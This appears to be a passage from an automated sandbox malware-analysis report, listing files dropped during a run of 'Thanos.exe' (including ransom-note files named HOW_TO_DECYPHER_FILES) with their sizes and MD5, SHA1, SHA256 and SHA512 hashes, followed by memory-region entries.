                                                                                                                                                                                                                    1548506345d220d68e9089b9a68b42a9d796141eb6236e600283951cb206eaa1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    1dd09cf14c87f60b42e5e56d0104154513902c9bfa23eef76a92f4a96c2356b2812dd6eee5e9a74d5ed078ade5f8f6d1f1b01961d7efadfebb543d71c2d31a30

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\_socket.pyd

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    78KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4b2f1faab9e55a65afa05f407c92cab4

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    1e5091b09fc0305cf29ec2e715088e7f46ccbbd4

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    241db349093604ab25405402ba8c4212016657c7e6a10edd3110abeb1cc2e1ba

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    68070db39cd14841bcd49db1acf19806b0aa4b4ac4c56518b3a3baddaac1cd533f0b3ef70a378f53d65c0d6c0f745a6102b63303ea7978c79f688c787efe9cc3

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\base_library.zip

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    764KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    935ecbb6c183daa81c0ac65c013afd67

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0d870c56a1a9be4ce0f2d07d5d4335e9239562d1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    7ae17d6eb5d9609dc8fc67088ab915097b4de375e286998166f931da5394d466

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    a9aac82ab72c06cfff1f1e34bf0f13cbf0d7f0dc53027a9e984b551c602d58d785c374b02238e927e7b7d69c987b1e8ab34bfc734c773ef23d35b0bdb25e99cb

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\libffi-7.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    eef7981412be8ea459064d3090f4b3aa

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    c60da4830ce27afc234b3c3014c583f7f0a5a925

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\mfc140u.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.8MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    639db7fe67e2e15d069a62c0ef4a971c

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    bdbf2517678f9066c4553e6fdace0a366929185c

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    760308cf8bedaebc4500049622d08ddcaca0024acbd3b6bdca1618ec48a91597

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    83cd3e89ddac3915686bceec25654f0a35fe66a1c27d95bcfd3b44bdc01ded0df9beb525e0604522f61d58183546af63ffdd60f90e5bffd648774169832d2335

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\python39.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4.3MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    7e9d14aa762a46bb5ebac14fbaeaa238

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    a5d90a7df9b90bdd8a84d7dc5066e4ea64ceb3d9

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e456ef44b261f895a01efb52d26c7a0c7d7d465b647a7b5592708ebf693f12a3

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    280f16348df1c0953bbc6f37ff277485351171d0545ebe469bacd106d907917f87584154aec0f193f37322bc93ac5433cd9a5b5c7f47367176e5a8b19bbd5023

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\pywintypes39.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    139KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d658ffb571a541e9e21a6b859a67e112

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    d9e7f54eb92ce32ff4d02fedd5c9b738dabbfbdb

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    0cc26e2acaa1933647f885b47ac6da6625be7a4cd93fae220fb172906ff22091

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    0040b19841d2d19ab5506cefc3186813cc92f57144b7b3f0bfec45638eebc053ddb8a40f2843cafe5d0ae5c6dc7f5db646a6441d34e02d749eb9563edbe5c7b9

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\select.pyd

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    28KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f8f5a047b98309d425fd06b3b41b16e4

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    2a44819409199b47f11d5d022e6bb1d5d1e77aea

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    5361da714a61f99136737630d50fa4e975d76f5de75e181af73c5a23a2b49012

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f0a96790fcdabf02b452f5c6b27604f5a10586b4bf759994e6d636cc55335026631fa302e209a53f5e454bea03b958b6d662e0be91fa64ce187a7dc5d35a9aa9

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\win32api.pyd

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    131KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    8ccfec535f312418015bcd067fe32208

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    79aa4bc6d681972afadfa4b2bae230ce06570a56

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    9157829433f0bd8a12b1a1cf2fb90301e20ecf43802eb0ac85525ebcc53d0e30

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    698b3a57338ffa47e2afecf9e8f8f709061e5cb56d82d8e10e48c6d4c8d26d2e0a21f2dcedc599a1b605ee2026dc2af7bd79d9f8b035c5c6fd9bd9fc817673b8

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\win32gui.pyd

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    223KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    6b671bc3676e868789caca8671f4f963

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0f464c7dcca0f3d6590286a9c240ea369e155e8c

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    23074dc90395366a8e9653d1b7ee32f61ed8b4c95bbafed2a25d6f2e17a550ce

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    69b42d227d53f789126c5e61d4d3140b3f7b3d8ba13116f266dd01da4e5f9b0bbe942973c98c85edac390cde4f7b9b3be349ef4401ff93fe2979bf5f3d237ee5

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI61962\win32ui.pyd

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.4MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    9d0e67cc69e04162b0d489e0c27cdce0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    75071fd378aeb880c9f45b82a016add7bbf9bee6

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    e45b1507bf6860246042ec7c37a3effbf87005c6701fd4cf6a548f7406ff9062

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    489dd05f19067d967f529ff00faaeed5145e0409f0d2385ced1b7368be2005e207ac6ee774257eaff47e74cb601c4cadd5b50aafe17d9e164e26d9bd39412485

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12jzak34.ssf.ps1

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    60B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gr2a4ksy.exe

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    232KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    75a586728aa168951b1c48f28f34c553

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    4e150e7cbffa43fb120876221343af15b3332049

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    9c2a20b67ede0cc57eb3e3708ead52d98ad6065d5a539319d771846acfac6a75

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    586aff19e18c0b30c9e3aa859c3dc028c2472625e98ef7c46e023118ce518cea149f4a8fe45dc3d43aba2e2e8a9faeb9ef34c25fa5b745e5fa294bbcdde04851

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\scoped_dir4468_1770373083\6783f773-1f4d-4604-a021-a75c14286205.tmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    152KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    fafe66ee01da160001ae142d3f7e1b26

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    06e36a5433be7f45c048cf6c6d2092c84fc480aa

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    f40c41233b742386c903fcad0ae6602bd6734f9ad08841c562c5506d6e5c8def

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    e2a44d9585a8135a4156895dd93fbdf46cfdac33d5cd725fb713ee64449a635a4eb7a4518e97ca899ad9fc6446e9c34bb5743f9d8d447c6bd5519f0d4ebbcd33

                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    446B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    cf4d8c7278aea01ddce2a6c82ecdc6a0

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    9dc1112826d26d860d0429b1df9c6a774ae865f1

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    63012ec05abb5d130c0e224112a7b353c3c78904b6982b36a50f6c40728f5d34

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    3e0c4583e3f6388c57c1b0a5cc1f5be3f1d48863e434fb9a8ab9efdafe33283590580dce0bce35fd26453fbc93fd86cb4667230fc170bf964eda203a0c9c6c72

                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\Thanos.exe

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    87KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    d6d956267a268c9dcf48445629d2803e

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\Thanos.exe:Zone.Identifier

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    55B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    0f98a5550abe0fb880568b1480c96a1c

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    d2ce9f7057b201d31f79f3aee2225d89f36be07d

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\Unconfirmed 11059.crdownload

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    9.8MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    a0db21d51864148981548857011d47dc

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    9d755e1209439fdf929365decc3be5045743a7cb

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    853ccfe86cd1f92aec31faad35027ef3b6cf0e7c089f8db3c0a0a18d20d7d160

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    f9e1997ca2a14f2bc68fe9e454611ec52166edafeb6f754668d206d37fbd0a034d806f0638567f5f47bfd901a1314890e7b5faa05da039b95b34116236710b1a

                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\thing.exe:Zone.Identifier

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    26B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    fbccf14d504b7b2dbcb5a5bda75bd93b

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    d59fc84cdd5217c6cf74785703655f78da6b582b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                                                                                                                                                                                  • memory/2404-923-0x00007FFA74C40000-0x00007FFA75702000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/2404-793-0x00007FFA74C40000-0x00007FFA75702000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                  • memory/2404-792-0x0000000000260000-0x000000000027C000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    112KB

                                                                                                                                                                                                                  • memory/2404-791-0x00007FFA74C43000-0x00007FFA74C45000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2904-802-0x000001E086B10000-0x000001E086B32000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    136KB